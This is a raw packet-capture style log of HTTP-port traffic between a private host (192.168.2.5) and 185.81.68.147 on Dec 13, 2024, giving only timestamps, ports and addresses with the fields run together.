                                                                                                                                                                Dec 13, 2024 01:37:08.603300095 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.604123116 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.604199886 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.604309082 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.605031967 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.605103970 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.605135918 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.605936050 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.606009960 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.606046915 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.606839895 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.606911898 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.606955051 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.607738972 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.607800961 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.608026981 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.608659983 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.608720064 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.608800888 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.609570980 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.609632015 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.609694958 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.610486031 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.610543966 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.610577106 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.611402035 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.611463070 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.611500978 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.612279892 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.612339020 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.612381935 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.613188982 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.613253117 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.613298893 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.614114046 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.614171982 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.614200115 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.615041971 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.615137100 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.615151882 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.615923882 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.615993977 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.616030931 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.616832972 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.616908073 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.616908073 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.617748022 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.617819071 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.617907047 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.618679047 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.618748903 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.618777990 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.619570971 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.619641066 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.619684935 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.620491028 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.620559931 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.620564938 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.660929918 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.765141010 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.765264988 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.765569925 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.765588999 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.765629053 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.765763044 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.766498089 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.766597986 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.766716957 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.767406940 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.767501116 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.767615080 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.768302917 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.768379927 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.768498898 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.769216061 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.769330978 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.769442081 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.770136118 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.770227909 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.770370960 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.771049976 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.771102905 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.771213055 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.771958113 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.772061110 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.772173882 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.772881031 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.772975922 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.773091078 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.773765087 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.773808002 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.773917913 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.774674892 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.774782896 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.774916887 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.775608063 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.775702000 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.775810003 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.776527882 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.776694059 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.776801109 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.777400970 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.777579069 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.777682066 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.778310061 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.778449059 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.778548956 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.779248953 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.779351950 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.779455900 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.780117035 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.780263901 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.780375957 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.781047106 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.781197071 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.781301975 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.781966925 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.782161951 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.782274008 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.782865047 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.782965899 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.783014059 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.783824921 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.783955097 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.784037113 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.784696102 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.784818888 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.784882069 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.785588026 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.785722971 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.785769939 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.786498070 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.786674023 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.786756039 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.787429094 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.787589073 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.787637949 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.788353920 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.788443089 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.788491011 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.789258957 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.789387941 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.789437056 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.790170908 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.790330887 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.790447950 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.791068077 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.791189909 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.791295052 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.791964054 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.792213917 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.792315960 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.792872906 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.793001890 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.793100119 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.793842077 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.793914080 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.794012070 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.794714928 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.794827938 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.794931889 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.795605898 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.795766115 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.795864105 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.796504021 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.796622038 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.796724081 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.797418118 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.797533989 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.797696114 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.798310995 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.798440933 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.798563957 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.799228907 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.799360991 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.799464941 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.800143957 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.800271988 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.800374985 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.801069975 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.801182032 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.801297903 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.801958084 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.802077055 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.802182913 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.802881002 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.802980900 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.803097963 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.803803921 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.803936005 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.804044008 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.804718018 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.804930925 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.805037022 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.805593967 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.805711985 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.805816889 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.806504965 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.806621075 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.806745052 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.807425022 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.807535887 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.807641029 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.808330059 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.808448076 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.808551073 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.809235096 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.809353113 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.809458017 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.810148954 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.810281038 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.810385942 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.811089039 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.811204910 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.811321974 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.811979055 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.812103987 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.812215090 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.812840939 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.864072084 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.956954956 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.957086086 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.957201958 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.957268953 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.957319975 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.957360983 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.958095074 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.958183050 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.958359003 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.959045887 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.959129095 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.959263086 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.959928989 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.960047960 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.960177898 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.960819006 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.960941076 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.961069107 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.961731911 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.961786032 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.961910009 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.962603092 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.962778091 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.962908983 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.963570118 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.963686943 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.963814974 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.964484930 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.964582920 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.964721918 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.965436935 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.965586901 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.965715885 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.966270924 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.966398954 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.966521025 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.967189074 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.967303991 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.967431068 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.968099117 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.968182087 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.968305111 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.969008923 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.969140053 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.969265938 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.969909906 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.970017910 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.970139980 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.970829010 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.970942974 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.971061945 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.971739054 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.971910000 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.972033024 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.972654104 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.972867012 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.972990036 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.973546982 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.973664999 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.973787069 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.974457026 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.974523067 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.974649906 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.975378036 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.975522995 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.975651026 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.976278067 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.976387978 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.976511955 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.977216005 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.977345943 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.977468014 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.978126049 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.978245974 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.978368044 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.979028940 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.979139090 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.979259014 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.979953051 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.980099916 CET8049707185.81.68.147192.168.2.5
